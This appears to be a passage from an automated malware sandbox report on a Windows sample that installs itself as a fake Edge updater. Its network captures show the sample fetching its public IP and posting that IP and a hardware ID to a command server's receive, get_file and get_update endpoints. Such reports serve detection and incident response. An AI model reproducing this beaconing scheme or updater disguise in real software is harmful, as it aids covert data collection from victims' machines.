Oct 11, 2024 10:19:16.329766035 CEST	227	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:19:16 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8d0d6c9abc9f4319-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	50001	172.67.74.152	80	4152	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:19:18.167553902 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 11, 2024 10:19:18.647917986 CEST	227	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:19:18 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8d0d6ca93fe4de97-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	50003	172.67.74.152	80	4152	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:19:19.607990980 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 11, 2024 10:19:20.062844992 CEST	227	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:19:20 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8d0d6cb219061a1f-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 11, 2024 10:19:50.823052883 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 11, 2024 10:19:50.925553083 CEST	227	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:19:50 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8d0d6d72fbe91a1f-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 11, 2024 10:19:51.892540932 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 11, 2024 10:19:51.995670080 CEST	227	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:19:51 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8d0d6d79add81a1f-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49712	104.21.54.163	443	4152	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-11 08:17:46 UTC	167	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue Connection: Keep-Alive
2024-10-11 08:17:46 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-11 08:17:46 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 65 62 37 64 61 32 35 64 36 63 36 36 35 33 33 33 35 31 64 64 65 64 32 34 33 37 32 31 62 38 62 39 30 30 39 65 34 32 65 34 63 36 65 66 39 62 63 63 33 36 39 62 66 31 63 35 39 66 61 63 39 64 66 Data Ascii: ip=8.46.123.33&hwid=deb7da25d6c66533351dded243721b8b9009e42e4c6ef9bcc369bf1c59fac9df
2024-10-11 08:17:46 UTC	635	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:17:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fhPA4RIzpjuUEd10joS2T5emcE25MFiQxDNbnoltQjQ%2FMDb1psq4YmYEU%2FaAsBaKfyzYnnFhERuMeDOZ03SHAfMIWxuad5zIniXddrKRcq57s0mu1FeItGiJl1XfPfKQHQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0d6a692a2641c3-EWR alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49713	104.21.54.163	443	4152	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-11 08:17:47 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-11 08:17:47 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-11 08:17:47 UTC	84	OUT	Data Raw: 68 77 69 64 3d 64 65 62 37 64 61 32 35 64 36 63 36 36 35 33 33 33 35 31 64 64 65 64 32 34 33 37 32 31 62 38 62 39 30 30 39 65 34 32 65 34 63 36 65 66 39 62 63 63 33 36 39 62 66 31 63 35 39 66 61 63 39 64 66 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=deb7da25d6c66533351dded243721b8b9009e42e4c6ef9bcc369bf1c59fac9df&ip=8.46.123.33
2024-10-11 08:17:48 UTC	637	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:17:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W322aHxfPEdw9hBUThCmoEjmlHnEqVpBLYXuy0lE3%2Bfm3GbErOb8FpJFOyVcsBN86uRJ35Mz4Ulwtejz2o5H16R4NdLN87OJa%2BPmozggDNnxfkykJaso%2FeHDyGO0OiGx2Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0d6a711cad4285-EWR alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49715	104.21.54.163	443	4152	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-11 08:17:48 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-11 08:17:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-11 08:17:48 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-11 08:17:48 UTC	633	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:17:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5lBhQUcdumNc%2BNizfT5zmrzLNjPoPii2e89Wzrnn1Us20J7gA1EN2nbVMAdt9kdXRB6wKR3TGUg6bP75ouvBF7pFpj9XDht6dkvqOJLg6kOxWezyYglCLBE5maUXBCGN7Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0d6a768ab9424a-EWR alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49998	104.21.54.163	443	4152	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-11 08:19:15 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-11 08:19:15 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-11 08:19:15 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 65 62 37 64 61 32 35 64 36 63 36 36 35 33 33 33 35 31 64 64 65 64 32 34 33 37 32 31 62 38 62 39 30 30 39 65 34 32 65 34 63 36 65 66 39 62 63 63 33 36 39 62 66 31 63 35 39 66 61 63 39 64 66 Data Ascii: ip=8.46.123.33&hwid=deb7da25d6c66533351dded243721b8b9009e42e4c6ef9bcc369bf1c59fac9df
2024-10-11 08:19:15 UTC	643	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:19:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bWScwfn49sTfPIPcCs92N44kOi%2F0D24sf%2FKKPjheQjHNYi04T1hILRxUemV3ApA5iHAl9mBgLd5%2Fb0CICogZB6lpPMfdF8fvvVOz%2BHHzIGm%2FHhR%2Bs5ZRVdGz70fX4Eigfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0d6c95d9440f3f-EWR alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	50002	104.21.54.163	443	4152	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-11 08:19:19 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-11 08:19:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-11 08:19:19 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 65 62 37 64 61 32 35 64 36 63 36 36 35 33 33 33 35 31 64 64 65 64 32 34 33 37 32 31 62 38 62 39 30 30 39 65 34 32 65 34 63 36 65 66 39 62 63 63 33 36 39 62 66 31 63 35 39 66 61 63 39 64 66 Data Ascii: ip=8.46.123.33&hwid=deb7da25d6c66533351dded243721b8b9009e42e4c6ef9bcc369bf1c59fac9df
2024-10-11 08:19:19 UTC	643	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:19:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PYOAu8G%2F51GR4UJwWT2y%2B1E%2Fw13Y4drR4WsGdUYPc%2Bwwa2KiogAq%2BxduGe0lRtvEZK5QmWVQ6bvOVbsnp0wY0rqd1hrqrv0x21lTqSb2Rz7o9qzCqiC2kkGdqLCXECE6%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0d6cad280a182d-EWR alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	50004	104.21.54.163	443	4152	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-11 08:19:20 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-11 08:19:20 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-11 08:19:20 UTC	84	OUT	Data Raw: 68 77 69 64 3d 64 65 62 37 64 61 32 35 64 36 63 36 36 35 33 33 33 35 31 64 64 65 64 32 34 33 37 32 31 62 38 62 39 30 30 39 65 34 32 65 34 63 36 65 66 39 62 63 63 33 36 39 62 66 31 63 35 39 66 61 63 39 64 66 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=deb7da25d6c66533351dded243721b8b9009e42e4c6ef9bcc369bf1c59fac9df&ip=8.46.123.33
2024-10-11 08:19:21 UTC	635	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:19:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qNlx3E0Yr8U3MTrexr3n5vivKZARaTYB4kKFiQYVycvbJSSutLOOJrawVGufUj9a3YUyxkjRSJ%2BGbbH6BGEJbN3xk7Ws6ynGTwuwPlPu9%2BWFlDqdhfFoDP3zaGZNnRSTdg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0d6cb66a930f5f-EWR alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	50005	104.21.54.163	443	4152	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-11 08:19:21 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-11 08:19:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-11 08:19:21 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-11 08:19:21 UTC	637	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:19:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dbrbbQdRXJI13Gcp40EW15VpQ0tA5V6ZNEAIAiEs2sdibIlPsC5nXjYbGjVhWjhf8urNkzWlP3TcRit2RfIrpC9o%2FCtPto8%2BjJkZlvfS0o01QIoUkIK%2FZ7YEY4XxlPaaQg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0d6cbc1e658c47-EWR alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.6	50009	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-11 08:19:51 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-11 08:19:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-11 08:19:51 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 65 62 37 64 61 32 35 64 36 63 36 36 35 33 33 33 35 31 64 64 65 64 32 34 33 37 32 31 62 38 62 39 30 30 39 65 34 32 65 34 63 36 65 66 39 62 63 63 33 36 39 62 66 31 63 35 39 66 61 63 39 64 66 Data Ascii: ip=8.46.123.33&hwid=deb7da25d6c66533351dded243721b8b9009e42e4c6ef9bcc369bf1c59fac9df
2024-10-11 08:19:51 UTC	641	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:19:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gemX4EQlKFURaZXbGxBshW%2FNd5Nsv%2BJea%2F2iO%2BNHGE2E2YA5MmPAVHePIMcGcYfD4E9S9GLoLvDEojfgJiRuS8m%2FgwaYZ0x2Fywnfvzx9j7Of2QvqUWmVlFnnXZoxD9k3w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0d6d76da86727d-EWR alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.6	50010	104.21.54.163	443

Timestamp	Bytes transferred	Direction	Data
2024-10-11 08:19:52 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-11 08:19:52 UTC	25	IN	HTTP/1.1 100 Continue

Target ID:	0
Start time:	04:17:42
Start date:	11/10/2024
Path:	C:\Users\user\Desktop\Yc9hcFC1ux.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Yc9hcFC1ux.exe"
Imagebase:	0x80000
File size:	27'136 bytes
MD5 hash:	0E926B28FC49F6259A70C032AE83CD14
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:17:43
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Imagebase:	0xc40000
File size:	27'136 bytes
MD5 hash:	0E926B28FC49F6259A70C032AE83CD14
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 65%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	04:17:43
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe" --checker
Imagebase:	0x5a0000
File size:	27'136 bytes
MD5 hash:	0E926B28FC49F6259A70C032AE83CD14
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 65%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	04:17:54
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Imagebase:	0x9f0000
File size:	27'136 bytes
MD5 hash:	0E926B28FC49F6259A70C032AE83CD14
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:17:55
Start date:	11/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 964
Imagebase:	0x130000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:18:03
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Imagebase:	0x120000
File size:	27'136 bytes
MD5 hash:	0E926B28FC49F6259A70C032AE83CD14
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:18:03
Start date:	11/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7104 -s 956
Imagebase:	0x130000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:18:24
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Imagebase:	0x550000
File size:	27'136 bytes
MD5 hash:	0E926B28FC49F6259A70C032AE83CD14
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:18:24
Start date:	11/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 948
Imagebase:	0x130000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:18:32
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Imagebase:	0x310000
File size:	27'136 bytes
MD5 hash:	0E926B28FC49F6259A70C032AE83CD14
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:18:32
Start date:	11/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1052 -s 948
Imagebase:	0x130000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	04:18:53
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Imagebase:	0x830000
File size:	27'136 bytes
MD5 hash:	0E926B28FC49F6259A70C032AE83CD14
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	04:18:54
Start date:	11/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 948
Imagebase:	0x130000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	04:19:01
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Imagebase:	0x2b0000
File size:	27'136 bytes
MD5 hash:	0E926B28FC49F6259A70C032AE83CD14
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	04:19:02
Start date:	11/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 948
Imagebase:	0x130000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	04:19:23
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Imagebase:	0x9f0000
File size:	27'136 bytes
MD5 hash:	0E926B28FC49F6259A70C032AE83CD14
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	04:19:23
Start date:	11/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6416 -s 948
Imagebase:	0x130000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	04:19:31
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"
Imagebase:	0x550000
File size:	27'136 bytes
MD5 hash:	0E926B28FC49F6259A70C032AE83CD14
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	04:19:31
Start date:	11/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 948
Imagebase:	0x130000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00A4215B Relevance: 2.1, Strings: 1, Instructions: 891COMMON

Download Yara Rule

Strings

,rf, xrefs: 00A4259B

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID: ,rf
API String ID: 0-2010036623
Opcode ID: 68e388fef078b0937358d0c8bcdee53c588e2f9dbfb4e32d5ac3968d56ba4b9a
Instruction ID: 72c8750a81eb01f579de198e503259d4edf8888438a1fae1743a954888f4b5d7
Opcode Fuzzy Hash: 68e388fef078b0937358d0c8bcdee53c588e2f9dbfb4e32d5ac3968d56ba4b9a
Instruction Fuzzy Hash: 2A414A35D097868FCB07AB3C9CB01EABF70DED2300711868BE1459B163DA24888EC796

Function 00A42201 Relevance: 1.7, Strings: 1, Instructions: 458COMMON

Download Yara Rule

Strings

,rf, xrefs: 00A4259B

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID: ,rf
API String ID: 0-2010036623
Opcode ID: 44f34e504e5eb5ee3780d36c32e5a49550c0e13dbb369fdf664209ba61237e7e
Instruction ID: 239d41dcd0891f0272642d0ff544e2fe7cf89ef0a4a1a69913ac4a8e6892f4c2
Opcode Fuzzy Hash: 44f34e504e5eb5ee3780d36c32e5a49550c0e13dbb369fdf664209ba61237e7e
Instruction Fuzzy Hash: 30219635E047468FCB06AF78D8605DEB7B1AFD9340710C25AD419AB251EB34A985CBD1

Function 00A41468 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

\of, xrefs: 00A414A2

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_Yc9hcFC1ux.jbxd

Similarity

API ID:
String ID: \of
API String ID: 0-3696475587
Opcode ID: f5cb7ab2eea6340d95719d5ce85f3401c9003fca79565081b067bde4736ec514
Instruction ID: a0282f710d157f449be8a49013cb2ab1804820e5c7f6f8df8c37148dca2f06df
Opcode Fuzzy Hash: f5cb7ab2eea6340d95719d5ce85f3401c9003fca79565081b067bde4736ec514
Instruction Fuzzy Hash: 5A31C371A017459FCB25DF34E940A9EBBF2EFC4300F108A2EE4869B295EB30AD45CB51

Function 00A419D0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

\jf, xrefs: 00A41A35

Memory Dump Source

Source File: 00000000.00000002.2123768846.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

